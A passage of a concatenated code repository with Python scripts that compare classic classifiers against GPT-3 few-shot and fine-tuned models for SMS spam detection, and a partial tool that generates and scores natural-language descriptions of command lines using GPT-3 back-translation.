302 | :param model_name: baseline gpt3 model name, text-davinci-002 for few-shot, davinci for fine-tuning
303 | :param data_type: data type
304 | :param column_text: the column for text
305 | :param column_label: the column for label
306 | :param positive_label: the value for positive label
307 | :param negative_label: the value for negative label
308 | :param fine_tune: True to fine-tune
309 | :param fine_tuned_model: fine-tuned model name
310 | :param fine_tune_context_sample_size: the sample size for fine-tuning context prompt
311 | :param prompt_context_sample_size: the sample size for few-shot context prompt
312 | :param sleep_time: sleep time in seconds
313 | """
314 | df_train = pd.read_csv(path_train_data, sep="\t")
315 | logger.info("path_train_data:{}, df_train.shape:{}".format(
316 | path_train_data, df_train.shape))
317 |
318 | if fine_tune:
319 | path_train_jsonl = path_train_data + ".finetune.jsonl"
320 | model_name = fine_tune_gpt3_model(
321 | df_train, path_train_jsonl, model_name,
322 | data_type=data_type,
323 | positive_label=positive_label,
324 | negative_label=negative_label,
325 | column_text=column_text,
326 | column_label=column_label,
327 | fine_tune_context_sample_size=fine_tune_context_sample_size)
328 | if model_name is None:
329 | return None
330 | df_train = df_train.sample(prompt_context_sample_size, replace=False)
331 | elif fine_tuned_model:
332 | model_name = fine_tuned_model
333 | df_train = df_train.sample(prompt_context_sample_size, replace=False)
334 |
335 | context_prompt = generate_prompt_text(
336 | df_train, data_type=data_type,
337 | positive_label=positive_label, negative_label=negative_label,
338 | column_text=column_text, column_label=column_label)
339 | logger.info("context_prompt:{}".format(context_prompt))
340 |
341 | df_test = pd.read_csv(path_test_data, sep="\t")
342 | logger.info("path_test_data:{}, df_test.shape:{}".format(
343 | path_test_data, df_test.shape))
344 |
345 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:"
346 | y_test, y_pred = [], []
347 | count_correct = 0
348 | for ix, row in df_test.iterrows():
349 | text = row[column_text]
350 | label = row[column_label]
351 | logger.info("{}.text:{}".format(ix, text))
352 | query_text = QUERY_TEMPLATE.format(data_type=data_type, text=text)
353 | prompt = context_prompt + query_text
354 | completion = get_openai_completion(prompt, model_name=model_name)
355 | if completion is not None:
356 | y_test.append(label == positive_label)
357 | y_pred.append(completion == positive_label)
358 | count_correct += 1 if label == completion else 0
359 | if sleep_time > 0:
360 | time.sleep(sleep_time)
361 | logger.info("label:{}, completion:{}, count_correct:{}".format(
362 | label, completion, count_correct))
363 |
364 | return classification_report(y_test, y_pred, output_dict=True)
365 |
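The evaluation loop above builds each request by appending a query made from QUERY_TEMPLATE to the few-shot context prompt, then scores the completion by exact string match against positive_label. A minimal sketch of that flow follows, with a stub in place of the OpenAI call. `fake_completion` and the example context string are assumptions for illustration only; the real context format comes from generate_prompt_text, which is not shown in this section.

```python
QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:"


def build_prompt(context_prompt, text, data_type="Message"):
    """Append the query for one test message to the few-shot context."""
    return context_prompt + QUERY_TEMPLATE.format(data_type=data_type, text=text)


def fake_completion(prompt):
    """Hypothetical stand-in for get_openai_completion (keyword rule only)."""
    # Look only at the final query, not at the context examples.
    query = prompt.rsplit("\nMessage: ", 1)[-1]
    return "Spam" if "free" in query.lower() else "Ham"


def score(rows, context_prompt, positive_label="Spam"):
    """Return (y_test, y_pred) as booleans, mirroring the loop above."""
    y_test, y_pred = [], []
    for text, label in rows:
        completion = fake_completion(build_prompt(context_prompt, text))
        if completion is not None:
            y_test.append(label == positive_label)
            y_pred.append(completion == positive_label)
    return y_test, y_pred


# Assumed context format; illustrative only.
context = "Message: Win a free prize now\nLabel: Spam\nMessage: See you at 5\nLabel: Ham"
rows = [("Free entry to win tickets", "Spam"), ("Lol u still feeling sick?", "Ham")]
y_test, y_pred = score(rows, context)
```

Because the comparison is an exact match, a completion with extra whitespace or different casing would count as a negative prediction, so the completion helper presumably has to return a normalized label.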
--------------------------------------------------------------------------------
/spam_detector/spam_detector.py:
--------------------------------------------------------------------------------
1 | import os
2 | import logging
3 | import argparse
4 | import glob
5 | import numpy as np
6 | import pandas as pd
7 | import shutil
8 | from matplotlib import pyplot
9 |
10 | from sklearn_models import evaluate_sklearn_model
11 | from gpt3_models import evaluate_gpt3_model, classify_message
12 |
13 |
14 | logging.basicConfig(format="%(asctime)s %(message)s",
15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO)
16 | logger = logging.getLogger(__name__)
17 |
18 |
19 | MAX_TEXT_DATA_LEN = 200
20 | MAX_SKLEARN_ML_FEATURES = 1000
21 |
22 |
23 | def generate_datasets(
24 | path_output_folder="spam_data",
25 | path_input_tsv_file="spam_data/SMSSpamCollection",
26 | column_text="text",
27 | column_label="label",
28 | positive_label="Spam",
29 | train_sample_size_list=[1024, 512, 32, 8, 2],
30 | test_sample_size=256,
31 | max_text_data_len=MAX_TEXT_DATA_LEN
32 | ):
33 | """
34 | generate train and test datasets from path_input_tsv_file.
35 | :param path_output_folder: output folder
36 | :param path_input_tsv_file: input data file
37 | :param column_text: column for text data
38 | :param column_label: column for label data
39 | :param positive_label: label value for positive samples
40 | :param train_sample_size_list: a list of training sample sizes
41 | :param test_sample_size: test sample size
42 | :param max_text_data_len: max text length for pre-processing
43 | """
44 | # load the input tsv file
45 | df = pd.read_csv(path_input_tsv_file, header=None,
46 | sep="\t", names=[column_label, column_text])
47 |
48 | # pre-process the label and text columns.
49 | df["label"] = df["label"].apply(lambda x: x.capitalize())
50 | df["text"] = df["text"].apply(lambda x: x[:max_text_data_len])
51 | logger.info("{}, df.shape:{}".format(path_input_tsv_file, df.shape))
52 | logger.info("df['label'].value_counts:{}".format(
53 | df["label"].value_counts()))
54 |
55 | # shuffle the df and split it into train and test datasets.
56 | df = df.sample(frac=1, replace=False)
57 | df_test, df_train = df[:test_sample_size], df[test_sample_size:]
58 | logger.info("df_test.shape:{}".format(df_test.shape))
59 | logger.info("df_test['label'].value_counts:{}".format(
60 | df_test["label"].value_counts()))
61 |
62 | logger.info("df_train.shape:{}".format(df_train.shape))
63 | logger.info("df_train['label'].value_counts:{}".format(
64 | df_train["label"].value_counts()))
65 |
66 | path_output = os.path.join(path_output_folder, "train.csv")
67 | df_train.to_csv(path_output, sep="\t", index=False)
68 |
69 | path_output = os.path.join(path_output_folder, "test.csv")
70 | df_test.to_csv(path_output, sep="\t", index=False)
71 |
72 | is_positive = df_train["label"] == positive_label
73 | df_train_positive = df_train[is_positive]
74 | df_train_negative = df_train[~is_positive]
75 |
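76 | # generate nested training datasets: each smaller set is sampled from the previous one, so train_sample_size_list must be sorted in descending order.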
77 | for train_sample_size in train_sample_size_list:
78 | positive_sample_size = negative_sample_size = train_sample_size//2
79 | df_train_positive = df_train_positive.sample(
80 | positive_sample_size, replace=False)
81 | df_train_negative = df_train_negative.sample(
82 | negative_sample_size, replace=False)
83 | # create a balanced dataset both from positive and negative samples
84 | df_train_all = pd.concat(
85 | [df_train_positive, df_train_negative]).sample(frac=1, replace=False)
86 |
87 | path_output = os.path.join(
88 | path_output_folder, "train_{}.csv".format(train_sample_size))
89 | df_train_all.to_csv(path_output, sep="\t", index=False)
90 | logger.info("{}, df_train_all.shape:{}".format(
91 | path_output, df_train_all.shape))
92 | logger.info("df_train_all['label'].value_counts:{}".format(
93 | df_train_all["label"].value_counts()))
94 |
95 |
96 | def evaluate_model_with_train_sample_sizes(
97 | path_results_output,
98 | model_name="RandomForest",
99 | path_data_folder="spam_data",
100 | train_sample_size_list=[2, 8, 32, 512, 1024],
101 | data_type="Message",
102 | column_text="text",
103 | column_label="label",
104 | positive_label="Spam",
105 | negative_label="Ham",
106 | fine_tune=True,
107 | fine_tuned_model="",
108 | fine_tune_context_sample_size=4,
109 | prompt_context_sample_size=3,
110 | sleep_time=1
111 | ):
112 | """
113 | evaluate a ML model with train sample sizes.
114 | :param path_results_output: path for outputs
115 | :param model_name: model name
116 | :param path_data_folder: path for data
117 | :param train_sample_size_list: a list of train sample sizes
118 | :param data_type: data type
119 | :param column_text: the column for text data
120 | :param column_label: the column for label data
121 | :param positive_label: the positive label value
122 | :param negative_label: the negative label value
123 | :param fine_tune: True to fine_tune
124 | :param fine_tuned_model: fine_tuned model name
125 | :param fine_tune_context_sample_size: the sample size for fine-tuning prompt data
126 | :param prompt_context_sample_size: the sample size for context prompt
127 | :param sleep_time: sleep time in seconds
128 | """
129 | logger.info("evaluate_model_with_train_sample_sizes:{}".format(locals()))
130 |
131 | f1_score_list = []
132 | for train_sample_size in train_sample_size_list:
133 | if train_sample_size > 0:
134 | path_train_data = os.path.join(
135 | path_data_folder, "train_{}.csv".format(train_sample_size))
136 | else:
137 | path_train_data = os.path.join(path_data_folder, "train.csv")
138 | path_test_data = os.path.join(path_data_folder, "test.csv")
139 |
140 | if model_name in ["RandomForest", "LogisticRegression"]:
141 | report_test = evaluate_sklearn_model(
142 | path_train_data=path_train_data,
143 | path_test_data=path_test_data,
144 | model_name=model_name,
145 | max_features=MAX_SKLEARN_ML_FEATURES,
146 | column_text=column_text,
147 | column_label=column_label,
148 | positive_label=positive_label
149 | )
150 | else:
151 | report_test = evaluate_gpt3_model(
152 | path_train_data,
153 | path_test_data=path_test_data,
154 | model_name=model_name,
155 | data_type=data_type,
156 | column_text=column_text,
157 | column_label=column_label,
158 | positive_label=positive_label,
159 | negative_label=negative_label,
160 | fine_tune=fine_tune,
161 | fine_tuned_model=fine_tuned_model,
162 | fine_tune_context_sample_size=fine_tune_context_sample_size,
163 | prompt_context_sample_size=prompt_context_sample_size,
164 | sleep_time=sleep_time
165 | )
166 |
167 | if report_test is not None:
168 | test_f1_score = report_test["weighted avg"]["f1-score"]
169 | report_item = {"train_size": train_sample_size}
170 | report_item.update(
171 | {"test_"+k: v for k, v in report_test["weighted avg"].items()})
172 | f1_score_list.append(report_item)
173 |
174 | logger.info("model_name:{}, train_size:{}, test_f1_score:{}".format(
175 | model_name, train_sample_size, test_f1_score))
176 |
177 | #store the f1 scores
178 | df = pd.DataFrame(f1_score_list)
179 | df.to_csv(path_results_output, index=False)
180 |
181 |
182 | def plot_f1_results(
183 | plot_item_list=[("RandomForest", "orange", "o", "../**/results_randomforest.csv")],
184 | path_output="result_f1_plot.pdf"
185 | ):
186 | """
187 | plot f1 results.
188 | :param plot_item_list: a list of plot data items
189 | :param path_output: file path for output image
190 | """
191 | pyplot.clf()
192 |
193 | for label, color, marker, path_pattern in plot_item_list:
194 | f1_list=[]
195 | for path_file in glob.glob(path_pattern, recursive=True):
196 | df = pd.read_csv(path_file)
197 | f1_list.append(df["test_f1-score"])
198 | if len(f1_list) == 0:
199 | continue
200 | x = [str(size) for size in df["train_size"]]
201 |
202 | f1_list = np.array(f1_list)
203 | #the mean f1 values
204 | f1_mean = np.mean(f1_list, axis=0)
205 | #the std f1 values
206 | f1_std = np.std(f1_list, axis=0)
207 | f1_upper = f1_mean + f1_std
208 | f1_lower = f1_mean - f1_std
209 |
210 | pyplot.plot(x, f1_mean, marker=marker, color=color, label=label)
211 | pyplot.fill_between(x, f1_lower, f1_upper, color=color, alpha=.2)
212 |
213 | pyplot.grid()
214 | pyplot.ylabel("F1-score")
215 | pyplot.xlabel("Training sample size")
216 | pyplot.legend(loc="lower right")
217 | pyplot.savefig(path_output)
218 |
219 |
220 | def run_experiments(path_data_folder="spam_data"):
221 | """
222 | run experiments with data sets in the data folder.
223 | :param path_data_folder: folder for the data sets
224 | """
225 | # generate train and test datasets.
226 | generate_datasets(
227 | path_output_folder=path_data_folder,
228 | path_input_tsv_file=os.path.join(
229 | path_data_folder, "SMSSpamCollection"),
230 | column_text="text",
231 | column_label="label",
232 | positive_label="Spam",
233 | #the sample size list for training datasets should be sorted in descending order.
234 | train_sample_size_list=[1024, 512, 32, 8, 2],
235 | test_sample_size=256
236 | )
237 |
238 | # evaluate RandomForest model
239 | path_results_randomforest = os.path.join(
240 | path_data_folder, "results_randomforest.csv")
241 | evaluate_model_with_train_sample_sizes(
242 | path_results_output=path_results_randomforest,
243 | model_name="RandomForest",
244 | path_data_folder=path_data_folder,
245 | #the sample size list for evaluation should be sorted in ascending order.
246 | train_sample_size_list=[2, 8, 32, 512, 1024]
247 | )
248 |
249 | # evaluate LogisticRegression model
250 | path_results_logisticregression = os.path.join(
251 | path_data_folder, "results_logisticregression.csv")
252 | evaluate_model_with_train_sample_sizes(
253 | path_results_output=path_results_logisticregression,
254 | model_name="LogisticRegression",
255 | path_data_folder=path_data_folder,
256 | train_sample_size_list=[2, 8, 32, 512, 1024]
257 | )
258 |
259 | # evaluate GPT-3 few-shot model with few samples of [2, 8, 32]
260 | path_results_gpt3_fewshot = os.path.join(
261 | path_data_folder, "results_gpt3_fewshot.csv")
262 | evaluate_model_with_train_sample_sizes(
263 | path_results_output=path_results_gpt3_fewshot,
264 | model_name="text-davinci-002",
265 | path_data_folder=path_data_folder,
266 | train_sample_size_list=[2, 8, 32],
267 | fine_tune=False
268 | )
269 |
270 | # evaluate GPT-3 fine-tuned model with training sample sizes of [512, 1024]
271 | path_results_gpt3_finetune = os.path.join(
272 | path_data_folder, "results_gpt3_finetune.csv")
273 | evaluate_model_with_train_sample_sizes(
274 | path_results_output=path_results_gpt3_finetune,
275 | model_name="davinci",
276 | path_data_folder=path_data_folder,
277 | train_sample_size_list=[512, 1024],
278 | fine_tune=True
279 | )
280 |
281 | #plot f1 results
282 | plot_items = [
283 | #(label, color, marker, path_pattern)
284 | ("GPT3_Fewshot", "blue", "*", path_results_gpt3_fewshot),
285 | ("GPT3_Finetune", "red", "*", path_results_gpt3_finetune),
286 | ("RandomForest", "orange", "o", path_results_randomforest),
287 | ("LogisticRegression", "green", "v", path_results_logisticregression)
288 | ]
289 | plot_f1_results(plot_items, path_output=os.path.join(path_data_folder, "results_f1_plot.pdf"))
290 |
291 |
292 | if __name__ == "__main__":
293 | parser = argparse.ArgumentParser(description="Spam detection")
294 | parser.add_argument(
295 | "--run_type",
296 | help="classify_message or evaluate_approaches",
297 | default="classify_message"
298 | )
299 | parser.add_argument(
300 | "--message",
301 | help="message to be classified",
302 | default=""
303 | )
304 | parser.add_argument(
305 | "--path_train_data",
306 | help="file path for training samples",
307 | default="spam_data/experiment_1/train_2.csv"
308 | )
309 |
310 | parser.add_argument(
311 | "--path_data_folder",
312 | help="file folder for data",
313 | default="spam_data"
314 | )
315 | parser.add_argument(
316 | "--num_experiments",
317 | type=int,
318 | help="number of experiments",
319 | default=5
320 | )
321 | args = parser.parse_args()
322 |
323 | if args.run_type == "classify_message":
324 | classify_message(
325 | message=args.message,
326 | path_train_data=args.path_train_data
327 | )
328 | else:
329 | #run experiments
330 | for ix in range(1, args.num_experiments+1):
331 | path_data_folder = os.path.join(args.path_data_folder, "experiment_{}".format(ix))
332 | logger.info("==== experiment_{}, path_data_folder:{}".format(ix, path_data_folder))
333 | os.makedirs(path_data_folder, exist_ok=True)
334 | path_src_data = os.path.join(args.path_data_folder, "SMSSpamCollection")
335 | path_dest_data = os.path.join(path_data_folder, "SMSSpamCollection")
336 | shutil.copyfile(path_src_data, path_dest_data)
337 | run_experiments(path_data_folder=path_data_folder)
338 |
339 | #plot mean f1 with all experiment results.
340 | plot_items = [
341 | #(label, color, marker, path_pattern)
342 | ("GPT3_Fewshot", "blue", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_fewshot.csv")),
343 | ("GPT3_Finetune", "red", "*", os.path.join(args.path_data_folder, "**", "results_gpt3_finetune.csv")),
344 | ("RandomForest", "orange", "o", os.path.join(args.path_data_folder, "**", "results_randomforest.csv")),
345 | ("LogisticRegression", "green", "v", os.path.join(args.path_data_folder, "**", "results_logisticregression.csv"))
346 | ]
347 | plot_f1_results(plot_items, path_output=os.path.join(args.path_data_folder, "results_mean_f1_plot.pdf"))
348 |
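plot_f1_results stacks the test_f1-score column from every matching results file and draws the per-size mean with a band of one standard deviation. The aggregation can be sketched without NumPy or matplotlib as below. The F1 values are made up for illustration, and statistics.pstdev is used because np.std defaults to the population standard deviation (ddof=0).

```python
from statistics import mean, pstdev


def f1_band(f1_runs):
    """Per-train-size mean and mean +/- std across experiment runs.

    f1_runs: list of runs, each a list of F1 scores ordered by train size.
    """
    columns = list(zip(*f1_runs))  # one tuple of scores per train size
    f1_mean = [mean(col) for col in columns]
    f1_std = [pstdev(col) for col in columns]
    f1_lower = [m - s for m, s in zip(f1_mean, f1_std)]
    f1_upper = [m + s for m, s in zip(f1_mean, f1_std)]
    return f1_mean, f1_lower, f1_upper


# Illustrative numbers only, not results from the repository.
runs = [[0.5, 0.75], [1.0, 0.75]]
f1_mean, f1_lower, f1_upper = f1_band(runs)
```

As in the original function, this only works when every run reports the same list of train sizes, since the scores are aligned by position.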
--------------------------------------------------------------------------------
/command_analyzer/command_analyzer.py:
--------------------------------------------------------------------------------
1 | import json
2 | import pandas as pd
3 | import argparse
4 | import logging
5 |
6 | from prompt_data import get_prompt_for_desc_from_cmd_tag
7 | from prompt_data import get_prompt_for_cmd_from_tag_desc
8 | from prompt_data import get_prompt_for_combined_desc
9 | from prompt_data import preprocess_tags_str
10 | from prompt_data import generate_text_list_with_prompt
11 | from similarity import get_sorted_similarity_score_list
12 | from similarity import get_ngrams_bleu_similarity_score
13 | from similarity import get_semantic_similarity_score
14 |
15 |
16 | logging.basicConfig(format="%(asctime)s %(message)s",
17 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
18 | logger = logging.getLogger(__name__)
19 |
20 |
21 | MAX_CMD_LEN = 200
22 |
23 | ENGINE_CMD2DESC = "code-davinci-002"
24 | ENGINE_DESC2CMD = "code-davinci-002"
25 | ENGINE_COMBINE_DESC = "text-davinci-002"
26 | ENGINE_EMBEDDINGS = "text-similarity-babbage-001"
27 |
28 | ENGINE_TEMPERATURE = 0.7
29 |
30 |
31 | def generate_desc_list_from_cmd_tag(
32 | cmd,
33 | tags,
34 | include_tag=True,
35 | include_prefix=False,
36 | engine=ENGINE_CMD2DESC,
37 | temperature=0.7,
38 | n=5,
39 | max_cmd_len=MAX_CMD_LEN
40 | ):
41 | """
42 | generates a list of descriptions from the command and tag info.
43 | :param cmd: command line data
44 | :param tags: "," separated tags data
45 | :param include_tag: True to include tags in prompt
46 | :param include_prefix: True to include support examples in prompt
47 | :param engine: openai engine
48 | :param temperature: temperature to control randomness of engine
49 | :param n: number of engine outputs
50 | :param max_cmd_len: max data length for command line data
51 | """
52 | prompt = get_prompt_for_desc_from_cmd_tag(
53 | cmd, tags, max_cmd_len=max_cmd_len,
54 | include_tag=include_tag, include_prefix=include_prefix)
55 | desc_list = generate_text_list_with_prompt(
56 | prompt, engine=engine, temperature=temperature, n=n)
57 | return desc_list
58 |
59 |
60 | def generate_cmd_list_from_tag_desc(
61 | cmd,
62 | tags,
63 | desc,
64 | include_tag=True,
65 | include_prefix=False,
66 | engine=ENGINE_DESC2CMD,
67 | temperature=0.7,
68 | n=1,
69 | max_cmd_len=MAX_CMD_LEN
70 | ):
71 | """
72 | generates a list of command lines from the description and tag info.
73 | :param cmd: command line data
74 | :param tags: "," separated tags data
75 | :param desc: description for the command line
76 | :param include_tag: True to include tags in prompt
77 | :param include_prefix: True to include support examples in prompt
78 | :param engine: openai engine
79 | :param temperature: temperature to control randomness of engine
80 | :param n: number of engine outputs
81 | :param max_cmd_len: max data length for command line data
82 | """
83 | first_token_as_cmd = cmd.split()[0]
84 | prompt = get_prompt_for_cmd_from_tag_desc(
85 | tags, desc, first_token_as_cmd, max_cmd_len=max_cmd_len,
86 | include_tag=include_tag, include_prefix=include_prefix)
87 | cmd_list = generate_text_list_with_prompt(
88 | prompt, engine=engine, temperature=temperature, n=n)
89 | return cmd_list
90 |
91 |
92 | def generate_combined_desc_from_cmd_desc(
93 | cmd,
94 | desc1,
95 | desc2,
96 | engine=ENGINE_COMBINE_DESC,
97 | temperature=0.7,
98 | max_cmd_len=MAX_CMD_LEN
99 | ):
100 | """
101 | generates a combined description from two descriptions.
102 | :param cmd: command line data
103 | :param desc1: the first description
104 | :param desc2: the second description
105 | :param engine: openai engine
106 | :param temperature: temperature to control randomness of engine
107 | :param max_cmd_len: max data length for command line data
108 | """
109 | prompt = get_prompt_for_combined_desc(
110 | cmd, desc1, desc2, max_cmd_len=max_cmd_len)
111 | desc = generate_text_list_with_prompt(
112 | prompt, engine=engine, temperature=temperature, n=1)[0]
113 | return desc
114 |
115 |
116 | def generate_sorted_desc_list_from_cmd_tag(
117 | cmd,
118 | tags,
119 | include_tag=True,
120 | include_prefix=False,
121 | weight_desc_score=.0,
122 | weight_tags_score=.0,
123 | desc_size=5,
124 | cmd_size=1,
125 | engine_cmd2desc=ENGINE_CMD2DESC,
126 | engine_desc2cmd=ENGINE_DESC2CMD,
127 | engine_embeddings=ENGINE_EMBEDDINGS,
128 | temperature=ENGINE_TEMPERATURE,
129 | max_cmd_len=MAX_CMD_LEN
130 | ):
131 | """
132 | generates a list of descriptions sorted by similarity scores.
133 | step1. generate a list of descs from cmd and tags
134 | step2. generate a list of cmds from tags and desc
135 | step3. sort descs by similarity scores
136 |
137 | :param cmd: command line data
138 | :param tags: "," separated tags data
139 | :param include_tag: True to include tags in prompt
140 | :param include_prefix: True to include support examples in prompt
141 | :param weight_desc_score: the weight for description score
142 | :param weight_tags_score: the weight for tags score
143 | :param desc_size: the number of output descriptions
144 | :param cmd_size: the number of output command lines
145 | :param engine_cmd2desc: the engine for command to description
146 | :param engine_desc2cmd: the engine for description to command
147 | :param engine_embeddings: the engine for text embeddings
148 | :param temperature: temperature to control randomness of engine
149 | :param max_cmd_len: max data length for command line data
150 | """
151 | tags = preprocess_tags_str(tags)
152 | logger.info(f"tags={tags}")
153 |
154 | desc_list = generate_desc_list_from_cmd_tag(
155 | cmd, tags, include_tag=include_tag, include_prefix=include_prefix,
156 | engine=engine_cmd2desc, temperature=temperature,
157 | n=desc_size, max_cmd_len=max_cmd_len)
158 | if len(desc_list) == 0:
159 | return [], ""  # keep the (desc_cmd_list, baseline_description) shape that callers unpack
160 | baseline_description = desc_list[0]
161 |
162 | cmd_first_token = cmd.split()[0]
163 | desc_cmd_list = []
164 | for desc in desc_list:
165 | generated_cmd = generate_cmd_list_from_tag_desc(
166 | cmd, tags, desc, include_tag=include_tag,
167 | include_prefix=include_prefix, n=cmd_size,
168 | engine=engine_desc2cmd, temperature=temperature,
169 | max_cmd_len=max_cmd_len)[0]
170 | #prepend cmd_first_token to the first generated text
171 | generated_cmd = cmd_first_token + generated_cmd
172 | desc_cmd_list.append((desc, generated_cmd))
173 | desc_cmd_list = get_sorted_similarity_score_list(
174 | cmd, tags,
175 | desc_cmd_list, engine=engine_embeddings,
176 | weight_desc_score=weight_desc_score,
177 | weight_tags_score=weight_tags_score, max_cmd_len=max_cmd_len)
178 | return desc_cmd_list, baseline_description
179 |
180 |
181 | def generate_descriptions_from_cmd_tags(
182 | cmd,
183 | tags=None,
184 | n=2,
185 | combine_descriptions=True,
186 | engine_cmd2desc=ENGINE_CMD2DESC,
187 | engine_desc2cmd=ENGINE_DESC2CMD,
188 | engine_embeddings=ENGINE_EMBEDDINGS,
189 | engine_combine_desc=ENGINE_COMBINE_DESC,
190 | temperature=ENGINE_TEMPERATURE,
191 | max_cmd_len=MAX_CMD_LEN
192 | ):
193 | """
194 | generates a combined description from a list of descriptions.
195 | :param cmd: command line data
196 | :param tags: "," separated tags data
197 | :param n: the number of output descriptions
198 | :param combine_descriptions: True to combine two descriptions
199 | :param engine_cmd2desc: the engine for command to description
200 | :param engine_desc2cmd: the engine for description to command
201 | :param engine_embeddings: the engine for text embeddings
202 | :param temperature: temperature to control randomness of engine
203 | :param max_cmd_len: max data length for command line data
204 | """
205 | logger.info("generate_descriptions_from_cmd_tags:{}".format(locals()))
206 |
207 | if tags:
208 | include_tag = True
209 | weight_desc_score = 0.3
210 | weight_tags_score = 0.2
211 | else:
212 | include_tag = False
213 | weight_desc_score = 0.5
214 | weight_tags_score = 0.0
215 |
216 | desc_cmd_items, baseline_description = generate_sorted_desc_list_from_cmd_tag(
217 | cmd, tags, include_tag=include_tag, include_prefix=1,
218 | weight_desc_score=weight_desc_score, weight_tags_score=weight_tags_score,
219 | desc_size=5, cmd_size=1,
220 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd,
221 | engine_embeddings=engine_embeddings, temperature=temperature,
222 | max_cmd_len=max_cmd_len)
223 |
224 | baseline_description = "The command" + baseline_description
225 |
226 | best_candidates = []
227 | first_desc, second_desc = '', ''
228 | for ix,item in enumerate(desc_cmd_items[:n]):
229 | score, _score_code, _score_desc, _score_tags, cmd, generated_cmd, desc = item[:]
230 | candidate_data = {"score":score, "desc":desc, "generated_cmd":generated_cmd}
231 | if ix == 0:
232 | first_desc = desc
233 | else:
234 | second_desc = desc
235 | logger.info(candidate_data)
236 | best_candidates.append(candidate_data)
237 |
238 | if first_desc and second_desc:
239 | if combine_descriptions:
240 | combined_desc = generate_combined_desc_from_cmd_desc(
241 | cmd, first_desc, second_desc,
242 | engine=engine_combine_desc, temperature=temperature,
243 | max_cmd_len=max_cmd_len)
244 | description = "The command" + combined_desc
245 | else:
246 | description = "The command" + first_desc
247 | else:
248 | description = "The command" + first_desc
249 | logger.info("\n"+description+"\n")
250 |
251 | return description, baseline_description, best_candidates
252 |
253 |
254 | def generate_description(
255 | cmd,
256 | tags=None,
257 | combine_descriptions=True,
258 | engine_cmd2desc=ENGINE_CMD2DESC,
259 | engine_desc2cmd=ENGINE_DESC2CMD,
260 | temperature=ENGINE_TEMPERATURE
261 | ):
262 | """
263 | generates a description from a command line and tag info.
264 | :param cmd: command line data
265 | :param tags: "," separated tags data
266 | :param combine_descriptions: True to combine two descriptions
267 | :param engine_cmd2desc: the engine for command to description
268 | :param engine_desc2cmd: the engine for description to command
269 | :param temperature: temperature to control randomness of engine
270 | """
271 | description, baseline_description, best_candidates = generate_descriptions_from_cmd_tags(
272 | cmd, tags=tags, n=2,
273 | combine_descriptions=combine_descriptions,
274 | engine_cmd2desc=engine_cmd2desc, engine_desc2cmd=engine_desc2cmd,
275 | temperature=temperature
276 | )
277 |
278 | logger.info("cmd:\n{}".format(cmd))
279 | logger.info("tags:\n{}".format(tags))
280 | logger.info("description:\n{}".format(description))
281 | logger.info("baseline_description:\n{}".format(baseline_description))
282 | logger.info("back-translated_cmd:\n{}".format(best_candidates[0]["generated_cmd"]))
283 | return description, baseline_description, best_candidates
284 |
285 |
286 | def evaluate_approaches(
287 | path_output_json,
288 | path_input_json,
289 | engine_cmd2desc=ENGINE_CMD2DESC,
290 | engine_desc2cmd=ENGINE_DESC2CMD,
291 | temperature=ENGINE_TEMPERATURE,
292 | combine_descriptions=True,
293 | offset=0,
294 | limit=0
295 | ):
296 | """
297 | evaluates baseline and back-translation approaches using a test dataset.
298 | :param path_output_json: file path for output data
299 | :param path_input_json: file path for input data
302 | :param engine_cmd2desc: the engine for command to description
303 | :param engine_desc2cmd: the engine for description to command
304 | :param temperature: temperature to control randomness of engine
305 | :param combine_descriptions: True to combine two descriptions
306 | :param offset: the offset of input data for partial testing
307 | :param limit: the limit of input data for partial testing
308 | """
309 | logger.info("evaluate_approaches:{}".format(locals()))
310 |
311 | with open(path_input_json) as fr:
312 | items = json.load(fr)
313 |
314 | if offset>0:
315 | items = items[offset:]
316 | if limit>0:
317 | items = items[:limit]
318 | logger.info("number of items in input file:{}".format(len(items)))
319 |
320 | results = []
321 | for ix, item in enumerate(items):
322 | logger.info("======== {}".format(ix))
323 |
324 | cmd = item["cmd"]
325 | tags = item["tags"]
326 | gold_description = item["gold_reference_description"]
327 |
328 | generated_description, baseline_description, _best_candidates = generate_description(
329 | cmd,
330 | tags=tags,
331 | combine_descriptions=combine_descriptions,
332 | engine_cmd2desc=engine_cmd2desc,
333 | engine_desc2cmd=engine_desc2cmd,
334 | temperature=temperature
335 | )
336 |
337 | item["generated_description"] = generated_description
338 | item["baseline_description"] = baseline_description
339 |
340 | candidate_list = [generated_description, baseline_description]
341 |
342 | ngram_bleu_scores = get_ngrams_bleu_similarity_score(gold_description, candidate_list)
343 | #ngram_bleu_scores_list.append(ngram_bleu_scores)
344 | item["ngram_bleu_scores"] = {
345 | "generated_description_score":ngram_bleu_scores[0], "baseline_description_score":ngram_bleu_scores[1]
346 | }
347 |
348 | semantic_similarity_scores = get_semantic_similarity_score(gold_description, candidate_list, engine=ENGINE_EMBEDDINGS)
349 | #semantic_similarity_scores_list.append(semantic_similarity_scores)
350 | item["semantic_similarity_scores"] = {
351 | "generated_description_score":semantic_similarity_scores[0], "baseline_description_score":semantic_similarity_scores[1]
352 | }
353 |
354 | results.append(item)
355 |
356 | logger.info("cmd:{}".format(cmd))
357 | logger.info("tags:{}".format(tags))
358 | logger.info("gold_description:{}".format(gold_description))
359 | logger.info("generated_description:{}".format(generated_description))
360 | logger.info("baseline_description:{}".format(baseline_description))
361 |
362 | logger.info("ngram_bleu_scores:{}".format(ngram_bleu_scores))
363 | logger.info("semantic_similarity_scores:{}".format(semantic_similarity_scores))
364 |
365 | #save the outputs
366 | with open(path_output_json, "wt") as fw:
367 | json.dump(results, fw, indent=2)
368 |
369 | #store the mean and std values for similarity scores
370 | df_bleu = pd.DataFrame([item["ngram_bleu_scores"] for item in results]).add_prefix("ngram_bleu_")
371 | df_semantic = pd.DataFrame([item["semantic_similarity_scores"] for item in results]).add_prefix("semantic_similarity_")
372 | df = df_bleu.join(df_semantic)
373 | df_mean_std = df.agg(["mean", "std"])
374 | logger.info("df_mean_std:{}".format(df_mean_std))
375 | path_output_score_csv = path_output_json + "_scores.csv"
376 | df_mean_std.to_csv(path_output_score_csv)
377 |
378 | return results
379 |
380 |
381 | if __name__ == "__main__":
382 | parser = argparse.ArgumentParser(description="Command to description")
383 |
384 | parser.add_argument(
385 | "--run_type",
386 | help="generate_desc or evaluate_approaches",
387 | default="generate_desc"
388 | )
389 | parser.add_argument(
390 | "--cmd",
